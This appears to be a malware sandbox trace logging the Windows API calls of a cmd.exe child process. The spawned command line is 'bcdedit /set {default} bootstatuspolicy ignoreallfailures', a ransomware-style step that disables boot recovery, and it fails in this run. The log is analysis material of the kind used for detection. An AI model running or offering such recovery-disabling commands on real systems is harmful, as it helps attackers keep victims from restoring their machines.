[0062.861] SetErrorMode (uMode=0x0) returned 0x1 [0062.861] GetProcessHeap () returned 0x650000 [0062.861] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x6507f0, Size=0x64) returned 0x6507f0 [0062.861] GetProcessHeap () returned 0x650000 [0062.861] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x6507f0) returned 0x64 [0062.861] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0062.861] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0062.861] GetProcessHeap () returned 0x650000 [0062.861] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x120) returned 0x663360 [0062.861] GetProcessHeap () returned 0x650000 [0062.861] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0x238) returned 0x650860 [0062.870] GetProcessHeap () returned 0x650000 [0062.870] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x650860, Size=0x122) returned 0x650860 [0062.870] GetProcessHeap () returned 0x650000 [0062.870] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x650860) returned 0x122 [0062.870] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0062.870] GetProcessHeap () returned 0x650000 [0062.870] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x8, Size=0xe0) returned 0x663488 [0062.870] RtlReAllocateHeap (Heap=0x650000, Flags=0x0, Ptr=0x663488, Size=0x76) returned 0x663488 [0062.870] GetProcessHeap () returned 0x650000 [0062.870] RtlSizeHeap (HeapHandle=0x650000, Flags=0x0, MemoryPointer=0x663488) returned 0x76 [0063.426] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0063.427] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x22ee94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee94) returned 0xffffffff [0063.427] GetLastError () returned 0x2 [0063.427] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x22ee94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee94) returned 0xffffffff [0063.427] GetLastError () returned 0x2 [0063.427] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0063.427] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x22ee94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee94) returned 0xffffffff [0063.428] GetLastError () returned 0x2 [0063.428] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x22ee94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee94) returned 0xffffffff [0063.428] GetLastError () returned 0x2 [0063.428] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0063.428] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x22ee94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee94) returned 0xffffffff [0063.428] GetLastError () returned 0x2 [0063.428] FindFirstFileExW (in: lpFileName="C:\\Windows\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x22ee94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee94) returned 0xffffffff [0063.429] GetLastError () returned 0x2 [0063.429] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0063.429] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x22ee94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee94) returned 0xffffffff [0063.431] GetLastError () returned 0x2 [0063.431] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x22ee94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee94) returned 0xffffffff [0063.434] GetLastError () returned 0x2 [0063.434] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0063.434] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit.*", fInfoLevelId=0x1, lpFindFileData=0x22ee94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee94) returned 0xffffffff [0063.436] GetLastError () returned 0x2 [0063.436] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\bcdedit", fInfoLevelId=0x1, lpFindFileData=0x22ee94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x22ee94) returned 0xffffffff [0063.439] GetLastError () returned 0x2 [0064.269] _get_osfhandle (_FileHandle=2) returned 0xb [0064.270] GetFileType (hFile=0xb) returned 0x2 [0064.270] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0064.270] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x22f2e8 | out: lpMode=0x22f2e8) returned 1 [0064.271] _get_osfhandle (_FileHandle=2) returned 0xb [0064.271] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x22f31c | out: lpConsoleScreenBufferInfo=0x22f31c) returned 1 [0064.271] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x49eb4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="'%1' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x5d [0064.273] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2331, dwLanguageId=0x0, lpBuffer=0x49eb4640, nSize=0x2000, Arguments=0x22f35c | out: lpBuffer="'bcdedit' is not recognized as an internal or external command,\r\noperable program or batch file.\r\n") returned 0x62 [0064.273] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x49eb4640*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x22f340, lpReserved=0x0 | out: lpBuffer=0x49eb4640*, lpNumberOfCharsWritten=0x22f340*=0x62) returned 1 [0064.273] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.273] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0064.274] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.274] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ea41ac | out: lpMode=0x49ea41ac) returned 1 [0064.274] _get_osfhandle (_FileHandle=0) returned 0x3 [0064.274] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ea41b0 | out: lpMode=0x49ea41b0) returned 1 [0064.275] SetConsoleInputExeNameW () returned 0x1 [0064.275] GetConsoleOutputCP () returned 0x1b5 [0064.275] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0064.275] SetThreadUILanguage (LangId=0x0) returned 0x409 [0064.276] exit (_Code=1) Process: id = "9" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x41ff6000" os_pid = "0x64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x360" cmd_line = "cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 9 os_tid = 0x490 [0062.749] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x3ffc84 | out: lpSystemTimeAsFileTime=0x3ffc84*(dwLowDateTime=0x1a2084c0, dwHighDateTime=0x1d62227)) [0062.749] GetCurrentProcessId () returned 0x64 [0062.749] GetCurrentThreadId () returned 0x490 [0062.749] GetTickCount () returned 0x11497ae [0062.749] QueryPerformanceCounter (in: lpPerformanceCount=0x3ffc7c | out: lpPerformanceCount=0x3ffc7c*=18270403658) returned 1 [0062.750] GetModuleHandleA (lpModuleName=0x0) returned 0x49e80000 [0062.750] __set_app_type (_Type=0x1) [0062.750] __p__fmode () returned 0x770331f4 [0062.871] __p__commode () returned 0x770331fc [0062.871] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ea21a6) returned 0x0 [0062.871] __getmainargs (in: _Argc=0x49ea4238, _Argv=0x49ea4240, _Env=0x49ea423c, _DoWildCard=0, _StartInfo=0x49ea4140 | out: _Argc=0x49ea4238, _Argv=0x49ea4240, _Env=0x49ea423c) returned 0 [0062.871] GetCurrentThreadId () returned 0x490 [0062.872] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x490) returned 0x60 [0062.872] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0062.872] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0062.872] SetThreadUILanguage (LangId=0x0) returned 0x409 [0062.872] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0062.872] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x3ffc14 | out: phkResult=0x3ffc14*=0x0) returned 0x2 [0062.873] VirtualQuery (in: lpAddress=0x3ffc4b, lpBuffer=0x3ffbe4, dwLength=0x1c | out: lpBuffer=0x3ffbe4*(BaseAddress=0x3ff000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0062.873] VirtualQuery (in: lpAddress=0x300000, lpBuffer=0x3ffbe4, dwLength=0x1c | out: lpBuffer=0x3ffbe4*(BaseAddress=0x300000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0062.873] VirtualQuery (in: lpAddress=0x301000, lpBuffer=0x3ffbe4, dwLength=0x1c | out: lpBuffer=0x3ffbe4*(BaseAddress=0x301000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0062.873] VirtualQuery (in: lpAddress=0x303000, lpBuffer=0x3ffbe4, dwLength=0x1c | out: lpBuffer=0x3ffbe4*(BaseAddress=0x303000, AllocationBase=0x300000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0062.873] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x3ffbe4, dwLength=0x1c | out: lpBuffer=0x3ffbe4*(BaseAddress=0x400000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xc0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0062.873] GetConsoleOutputCP () returned 0x1b5 [0062.873] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0062.873] SetConsoleCtrlHandler (HandlerRoutine=0x49e9e72a, Add=1) returned 1 [0062.873] _get_osfhandle (_FileHandle=1) returned 0x7 [0062.873] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0062.874] _get_osfhandle (_FileHandle=1) returned 0x7 [0062.874] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ea41ac | out: lpMode=0x49ea41ac) returned 1 [0062.874] _get_osfhandle (_FileHandle=1) returned 0x7 [0062.874] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0062.874] _get_osfhandle (_FileHandle=0) returned 0x3 [0062.874] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ea41b0 | out: lpMode=0x49ea41b0) returned 1 [0062.875] _get_osfhandle (_FileHandle=0) returned 0x3 [0062.875] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0062.875] GetEnvironmentStringsW () returned 0x612058* [0062.875] GetProcessHeap () returned 0x600000 [0062.875] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0xaca) returned 0x612b30 [0062.876] FreeEnvironmentStringsW (penv=0x612058) returned 1 [0062.876] GetProcessHeap () returned 0x600000 [0062.876] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x4) returned 0x610c90 [0062.876] GetEnvironmentStringsW () returned 0x612058* [0062.876] GetProcessHeap () returned 0x600000 [0062.876] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0xaca) returned 0x613608 [0062.876] FreeEnvironmentStringsW (penv=0x612058) returned 1 [0062.876] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3feb84 | out: phkResult=0x3feb84*=0x68) returned 0x0 [0062.876] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3feb8c, lpData=0x3feb90, lpcbData=0x3feb88*=0x1000 | out: lpType=0x3feb8c*=0x0, lpData=0x3feb90*=0x0, lpcbData=0x3feb88*=0x1000) returned 0x2 [0062.876] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3feb8c, lpData=0x3feb90, lpcbData=0x3feb88*=0x1000 | out: lpType=0x3feb8c*=0x4, lpData=0x3feb90*=0x1, lpcbData=0x3feb88*=0x4) returned 0x0 [0062.877] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3feb8c, lpData=0x3feb90, lpcbData=0x3feb88*=0x1000 | out: lpType=0x3feb8c*=0x0, lpData=0x3feb90*=0x1, lpcbData=0x3feb88*=0x1000) returned 0x2 [0062.877] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3feb8c, lpData=0x3feb90, lpcbData=0x3feb88*=0x1000 | out: lpType=0x3feb8c*=0x4, lpData=0x3feb90*=0x0, lpcbData=0x3feb88*=0x4) returned 0x0 [0062.877] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3feb8c, lpData=0x3feb90, lpcbData=0x3feb88*=0x1000 | out: lpType=0x3feb8c*=0x4, lpData=0x3feb90*=0x40, lpcbData=0x3feb88*=0x4) returned 0x0 [0062.877] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3feb8c, lpData=0x3feb90, lpcbData=0x3feb88*=0x1000 | out: lpType=0x3feb8c*=0x4, lpData=0x3feb90*=0x40, lpcbData=0x3feb88*=0x4) returned 0x0 [0062.877] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3feb8c, lpData=0x3feb90, lpcbData=0x3feb88*=0x1000 | out: lpType=0x3feb8c*=0x0, lpData=0x3feb90*=0x40, lpcbData=0x3feb88*=0x1000) returned 0x2 [0062.877] RegCloseKey (hKey=0x68) returned 0x0 [0062.877] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x3feb84 | out: phkResult=0x3feb84*=0x68) returned 0x0 [0062.877] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x3feb8c, lpData=0x3feb90, lpcbData=0x3feb88*=0x1000 | out: lpType=0x3feb8c*=0x0, lpData=0x3feb90*=0x40, lpcbData=0x3feb88*=0x1000) returned 0x2 [0062.877] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x3feb8c, lpData=0x3feb90, lpcbData=0x3feb88*=0x1000 | out: lpType=0x3feb8c*=0x4, lpData=0x3feb90*=0x1, lpcbData=0x3feb88*=0x4) returned 0x0 [0062.877] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x3feb8c, lpData=0x3feb90, lpcbData=0x3feb88*=0x1000 | out: lpType=0x3feb8c*=0x0, lpData=0x3feb90*=0x1, lpcbData=0x3feb88*=0x1000) returned 0x2 [0062.877] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x3feb8c, lpData=0x3feb90, lpcbData=0x3feb88*=0x1000 | out: lpType=0x3feb8c*=0x4, lpData=0x3feb90*=0x0, lpcbData=0x3feb88*=0x4) returned 0x0 [0062.877] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x3feb8c, lpData=0x3feb90, lpcbData=0x3feb88*=0x1000 | out: lpType=0x3feb8c*=0x4, lpData=0x3feb90*=0x9, lpcbData=0x3feb88*=0x4) returned 0x0 [0062.877] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x3feb8c, lpData=0x3feb90, lpcbData=0x3feb88*=0x1000 | out: lpType=0x3feb8c*=0x4, lpData=0x3feb90*=0x9, lpcbData=0x3feb88*=0x4) returned 0x0 [0062.878] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x3feb8c, lpData=0x3feb90, lpcbData=0x3feb88*=0x1000 | out: lpType=0x3feb8c*=0x0, lpData=0x3feb90*=0x9, lpcbData=0x3feb88*=0x1000) returned 0x2 [0062.878] RegCloseKey (hKey=0x68) returned 0x0 [0062.878] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb031ff [0062.878] srand (_Seed=0x5eb031ff) [0062.878] GetCommandLineW () returned="cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures" [0062.878] GetCommandLineW () returned="cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures" [0062.878] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ea5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0062.878] GetProcessHeap () returned 0x600000 [0062.878] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x210) returned 0x612058 [0062.878] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x612060, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0062.879] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0062.879] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0062.879] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0062.879] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0062.879] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0062.879] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0062.879] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0062.879] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0062.879] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0062.879] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0062.879] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0062.879] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0062.879] GetProcessHeap () returned 0x600000 [0062.879] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x612b30 | out: hHeap=0x600000) returned 1 [0062.879] GetEnvironmentStringsW () returned 0x612270* [0062.879] GetProcessHeap () returned 0x600000 [0062.879] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0xae2) returned 0x614bd0 [0062.879] FreeEnvironmentStringsW (penv=0x612270) returned 1 [0062.879] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0062.879] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49eb0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0062.879] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0062.880] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0062.880] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0062.880] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0062.880] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0062.880] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0062.880] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0062.880] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0062.880] GetProcessHeap () returned 0x600000 [0062.880] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x54) returned 0x6156c0 [0062.880] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3ff950 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0062.880] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x3ff950, lpFilePart=0x3ff94c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3ff94c*="Desktop") returned 0x25 [0062.880] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0062.880] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x3ff6cc | out: lpFindFileData=0x3ff6cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x611ed8 [0062.880] FindClose (in: hFindFile=0x611ed8 | out: hFindFile=0x611ed8) returned 1 [0062.880] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x3ff6cc | out: lpFindFileData=0x3ff6cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x611ed8 [0062.881] FindClose (in: hFindFile=0x611ed8 | out: hFindFile=0x611ed8) returned 1 [0062.881] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0062.881] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x3ff6cc | out: lpFindFileData=0x3ff6cc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd010580, ftLastAccessTime.dwHighDateTime=0x1d62227, ftLastWriteTime.dwLowDateTime=0xd010580, ftLastWriteTime.dwHighDateTime=0x1d62227, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x611ed8 [0062.881] FindClose (in: hFindFile=0x611ed8 | out: hFindFile=0x611ed8) returned 1 [0062.881] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0062.881] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0062.881] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0062.881] GetProcessHeap () returned 0x600000 [0062.881] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x614bd0 | out: hHeap=0x600000) returned 1 [0062.881] GetEnvironmentStringsW () returned 0x6140e0* [0062.881] GetProcessHeap () returned 0x600000 [0062.881] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0xb36) returned 0x615f20 [0062.881] FreeEnvironmentStringsW (penv=0x6140e0) returned 1 [0062.881] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49ea5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0062.881] GetProcessHeap () returned 0x600000 [0062.882] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6156c0 | out: hHeap=0x600000) returned 1 [0062.882] GetProcessHeap () returned 0x600000 [0062.882] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x400e) returned 0x616a60 [0062.882] GetProcessHeap () returned 0x600000 [0062.882] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x80) returned 0x612db0 [0062.882] GetProcessHeap () returned 0x600000 [0062.882] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x616a60 | out: hHeap=0x600000) returned 1 [0062.882] GetConsoleOutputCP () returned 0x1b5 [0062.882] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49ea4260 | out: lpCPInfo=0x49ea4260) returned 1 [0062.882] GetUserDefaultLCID () returned 0x409 [0062.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ea4950, cchData=8 | out: lpLCData=":") returned 2 [0062.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x3ffa90, cchData=128 | out: lpLCData="0") returned 2 [0062.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x3ffa90, cchData=128 | out: lpLCData="0") returned 2 [0062.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x3ffa90, cchData=128 | out: lpLCData="1") returned 2 [0062.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49ea4940, cchData=8 | out: lpLCData="/") returned 2 [0062.883] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49ea4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0062.884] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49ea4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0062.884] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49ea4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0062.884] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49ea4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0062.884] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49ea4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0062.884] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49ea4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0062.884] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49ea4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0062.884] 